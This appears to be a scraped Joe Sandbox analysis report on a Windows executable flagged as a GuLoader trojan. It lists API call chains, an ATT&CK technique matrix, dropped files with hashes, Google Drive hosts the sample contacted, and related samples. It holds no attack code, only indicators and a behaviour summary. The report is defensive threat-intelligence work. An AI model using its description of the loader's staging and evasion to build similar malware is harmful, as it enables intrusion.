      Source: C:\Users\user\Desktop\SvmL9tW29w.exeAPI call chain: ExitProcess graph end nodegraph_0-4417
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeAPI call chain: ExitProcess graph end nodegraph_0-4238
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LdrInitializeThunk,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_742F1A98 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,0_2_742F1A98
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeProcess created: C:\Users\user\Desktop\SvmL9tW29w.exe "C:\Users\user\Desktop\SvmL9tW29w.exe"Jump to behavior
      Source: C:\Users\user\Desktop\SvmL9tW29w.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LdrInitializeThunk,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess,0_2_00403348
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping211
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection
      2
      Virtualization/Sandbox Evasion
      LSASS Memory2
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Clipboard Data
      3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager2
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection
      NTDS23
      System Information Discovery
      Distributed Component Object ModelInput Capture14
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      SvmL9tW29w.exe75%ReversingLabsWin32.Trojan.Guloader
      SvmL9tW29w.exe76%VirustotalBrowse
      SvmL9tW29w.exe100%AviraTR/Injector.ugdfe
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsi2E71.tmp\System.dll0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://www.google.com(0%Avira URL Cloudsafe
      http://www.ftp.ftp://ftp.gopher.0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      142.250.184.238
      truefalse
        high
        drive.usercontent.google.com
        142.250.185.97
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comSvmL9tW29w.exe, 00000009.00000003.3631364810.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.0000000006305000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3608742977.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdSvmL9tW29w.exe, 00000009.00000001.3517314416.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
              high
              http://nsis.sf.net/NSIS_ErrorSvmL9tW29w.exefalse
                high
                https://translate.google.com/translate_a/element.jsSvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://drive.google.com/SvmL9tW29w.exe, 00000009.00000003.3715379970.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3631321160.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655654873.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3642567377.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000002.3751806082.000000000627A000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668258540.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704647426.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3642509957.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681426185.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3631364810.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214SvmL9tW29w.exe, 00000009.00000001.3517314416.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                      high
                      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdSvmL9tW29w.exe, 00000009.00000001.3517314416.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                        high
                        https://www.google.com(SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.ftp.ftp://ftp.gopher.SvmL9tW29w.exe, 00000009.00000001.3517314416.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://drive.google.com/crosoftSvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://drive.usercontent.google.com/SvmL9tW29w.exe, 00000009.00000002.3751806082.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704647426.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3642509957.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681426185.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3631364810.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://apis.google.comSvmL9tW29w.exe, 00000009.00000003.3631364810.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3715574688.0000000006305000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3608742977.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://nsis.sf.net/NSIS_ErrorErrorSvmL9tW29w.exefalse
                                high
                                https://drive.google.com/ISvmL9tW29w.exe, 00000009.00000003.3655654873.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704761871.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668258540.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3704647426.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681426185.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3668311470.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3681464313.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3655569006.00000000062C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://drive.google.com/gle.SvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://drive.usercontent.google.com/g_SvmL9tW29w.exe, 00000009.00000003.3619637227.00000000062C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://drive.google.com/vMSvmL9tW29w.exe, 00000009.00000002.3752107666.00000000062C5000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727364908.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3727453775.00000000062C4000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738465543.00000000062C0000.00000004.00000020.00020000.00000000.sdmp, SvmL9tW29w.exe, 00000009.00000003.3738636825.00000000062C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        142.250.184.238
                                        drive.google.comUnited States
                                        15169GOOGLEUSfalse
                                        142.250.185.97
                                        drive.usercontent.google.comUnited States
                                        15169GOOGLEUSfalse
                                        Joe Sandbox version:42.0.0 Malachite
                                        Analysis ID:1587619
                                        Start date and time:2025-01-10 15:52:16 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 49s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:11
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:SvmL9tW29w.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:d34f580b7d5be3be089661d02663d0605cd776008a2301491f11299c13f6642f.exe
                                        Detection:MAL
                                        Classification:mal76.troj.evad.winEXE@3/8@2/2
                                        EGA Information:
                                        • Successful, ratio: 50%
                                        HCA Information:
                                        • Successful, ratio: 98%
                                        • Number of executed functions: 48
                                        • Number of non-executed functions: 28
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240s for sample files taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target SvmL9tW29w.exe, PID 8044 because there are no executed function
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        TimeTypeDescription
                                        11:54:10API Interceptor6x Sleep call for process: SvmL9tW29w.exe modified
                                        No context
                                        No context
                                        No context
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        37f463bf4616ecd445d4a1937da06e19Osb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                        • 142.250.184.238
                                        • 142.250.185.97
                                        fTSt7dc60O.exeGet hashmaliciousGuLoaderBrowse
                                        • 142.250.184.238
                                        • 142.250.185.97
                                        vq6jxdGvD6.exeGet hashmaliciousGuLoaderBrowse
                                        • 142.250.184.238
                                        • 142.250.185.97
                                        Ub46mg9pn4.exeGet hashmaliciousGuLoaderBrowse
                                        • 142.250.184.238
                                        • 142.250.185.97
                                        fTSt7dc60O.exeGet hashmaliciousGuLoaderBrowse
                                        • 142.250.184.238
                                        • 142.250.185.97
                                        nRNzqQOQwk.exeGet hashmaliciousGuLoaderBrowse
                                        • 142.250.184.238
                                        • 142.250.185.97
                                        You7ynHizy.exeGet hashmaliciousGuLoaderBrowse
                                        • 142.250.184.238
                                        • 142.250.185.97
                                        Xjz8dblHDe.exeGet hashmaliciousGuLoaderBrowse
                                        • 142.250.184.238
                                        • 142.250.185.97
                                        zrNcqxZRSM.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                        • 142.250.184.238
                                        • 142.250.185.97
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Users\user\AppData\Local\Temp\nsi2E71.tmp\System.dllOsb7hkGfAb.exeGet hashmaliciousGuLoaderBrowse
                                          fbXZ4ErQMU.exeGet hashmaliciousGuLoaderBrowse
                                            fbXZ4ErQMU.exeGet hashmaliciousUnknownBrowse
                                              dIPYIbWXs1.exeGet hashmaliciousUnknownBrowse
                                                dIPYIbWXs1.exeGet hashmaliciousGuLoaderBrowse
                                                  eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                                    eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                                      RFQ-24064562-SUPPLY-NOv-ORDER.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        LkzvfB4VFj.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          LkzvfB4VFj.exeGet hashmaliciousGuLoaderBrowse
                                                            Process:C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):11776
                                                            Entropy (8bit):5.854450882766351
                                                            Encrypted:false
                                                            SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                            MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                            SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                            SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                            SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: Osb7hkGfAb.exe, Detection: malicious, Browse
                                                            • Filename: fbXZ4ErQMU.exe, Detection: malicious, Browse
                                                            • Filename: fbXZ4ErQMU.exe, Detection: malicious, Browse
                                                            • Filename: dIPYIbWXs1.exe, Detection: malicious, Browse
                                                            • Filename: dIPYIbWXs1.exe, Detection: malicious, Browse
                                                            • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                            • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                            • Filename: RFQ-24064562-SUPPLY-NOv-ORDER.com.exe, Detection: malicious, Browse
                                                            • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                            • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                            Reputation:moderate, very likely benign file
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):459404
                                                            Entropy (8bit):2.6518324932533326
                                                            Encrypted:false
                                                            SSDEEP:1536:UX3YycIm8nyFk0mZCMhj9d4tDui9GTEjyNxcPlIp5EXORxlEkO4nvhzleYC9iYlr:idFdJoxn9FuVVb8QMrdBEbUi5nx1e
                                                            MD5:CD57843C905DAE48C82E39A4258863FA
                                                            SHA1:44827D630C38FEAEB7E5159D9FD72ED0D02B455E
                                                            SHA-256:1F72CB627C58799924FED6AC72F19582BD1619B3D817EF6208AC8FD621B16AE2
                                                            SHA-512:50B63691BA51CF7D493F69B44842C53B22EBEBBEC641148818D0D036381B6E0814DFAEB02C295D792F9B2556CC4CC3A2FBA17DF2310A53A9120AF41F0E61C644
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:00E600EA00AF000073737373000000BC0000A30084000D00000000999999000000B500AD0000008F000000A1A1A1006E6E6E6E000044440000131313130000000000000000D4000000000000C5000000ACACAC006400000000400000AFAF000A00C60049494949000000B1B1008E000000DA00008B00004D4D0000000000F4F4F4005B0000BA00E800000000008F8F8F000000EFEFEF000000090085850000005A5A00000000B0B000001A1A00A4A400001B000027270000000000005900009C9C9C9C00860000800000000000000000B0009B000E0000310000006F6F0009009E0000002000009B9B00390012009900454500E00024007F0080000036009E000080004A009090008A8A0000000000D10066006D0000000000151515150062626200F1005B00005100000046005900006A6A00000000B3003700D2D2D2D2D2D2007F7F000000A6000000DFDFDF00000081000000007E7E00370000E8000C00CDCD00001100C800008D8D00808000E7E7E7E7004A008D00000000A9A900CC0000000B007A7A0000000000FBFBFB0000E5003E0000006900CC000000005A5A000000AAAAAA00CBCB0000AFAFAF00007B00000000000015009696960057575757004141007D7D00000081006D0000004B00C900000000B4000000676700DCDC00580000240063000000101010005A5A5A5A00003100
                                                            Process:C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):389868
                                                            Entropy (8bit):1.2469892412772452
                                                            Encrypted:false
                                                            SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                            MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                            SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                            SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                            SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:...........................E.....................................................................<......................].....f........................_...G..........S....................................@...............j...................................................I...................|..C..........................................................d......%t..........N..................d...Q...........p....3..........................................L...........y...............................-........................................................................@.........]..3........A................................*............................................................................................@...........(............................{..4......................................k.................{.....................W.................,......+...............K....b.......................!.............................H..)..........................E..........................
                                                            Process:C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):442363
                                                            Entropy (8bit):1.2533707838755617
                                                            Encrypted:false
                                                            SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                            MD5:5465B75724C031B21C018F7D72941F72
                                                            SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                            SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                            SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:.........................................................................|......................................v..g..................................................................C...........`.......................................... ...............#.....................K..0.................\................................4.......................................y...................."........k..............9.H.................................................................."...........m............................6...................................................E..)..........[..............TZ..............Q............_...........$...... ..........................W....................................................y..................................q......!.................................... .....................o..........*........................................................................[..............9..................s....;..........................................
                                                            Process:C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):521
                                                            Entropy (8bit):4.284169749449499
                                                            Encrypted:false
                                                            SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                            MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                            SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                            SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                            SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.
                                                            Process:C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):213287
                                                            Entropy (8bit):7.489603354812552
                                                            Encrypted:false
                                                            SSDEEP:3072:WL9bmzfRKieKf7D+J2fmj2iT+mcc+v9dbGh0OxZL7pETPCgM54LjqqJVbX5Tvth:WL9b2RzZD+J2f6AryJNQ/LjFJppTlh
                                                            MD5:1DD1D79AAFF9507EDDC216B384AECED4
                                                            SHA1:AC335E49694F0CAD10CB7452691EEE5FCFD89EF0
                                                            SHA-256:0DFBDAB8E6499BD6F6785C14266C6DBB965BCC57B8608FBD76627493A63EE34A
                                                            SHA-512:73831B529EB00BB7257312A26E64982FDEEAFDB7AD0E5FF7E98527B90E61AAA31368CD401751E77A77584BAABF349D30DC8270BE0DCD69B1FCFEE065DD8A0DE9
                                                            Malicious:false
                                                            Preview:.__.................O.S.O....J..../......9...........#.*.t........R..........`.e......pp...Z................-...m.U...ll...........&.....C.44..............*....?.....[.....................++.6...........d.."............................]]............K........................ZZZ...JJ.......................... ...JJ.....mm.....^.................U..........11............DDDD..ddd........M.\.qq..(....................t.....Z...........<<<.......Q.!!..........._..gg......\\\....&&.dd.....P......<...qqq....@@@.))).........N.F.iii..q..d.gg..#..==..r.....................55555..........\.......j..........Y.6....j.wwww....................|........M........ww.ss......___............;;...".......................6.BB.......E............................................Y...............................JJ.....ZZ.................8.............__......DD.f.....9.........U..........qqq...=..............VVVVV...Q.....................................................gg.X...WWWW............d.......u...{.......
                                                            Process:C:\Users\user\Desktop\SvmL9tW29w.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):485127
                                                            Entropy (8bit):1.2565961974341746
                                                            Encrypted:false
                                                            SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                            MD5:580D05E679E74B036B55CA8E5FF32769
                                                            SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                            SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
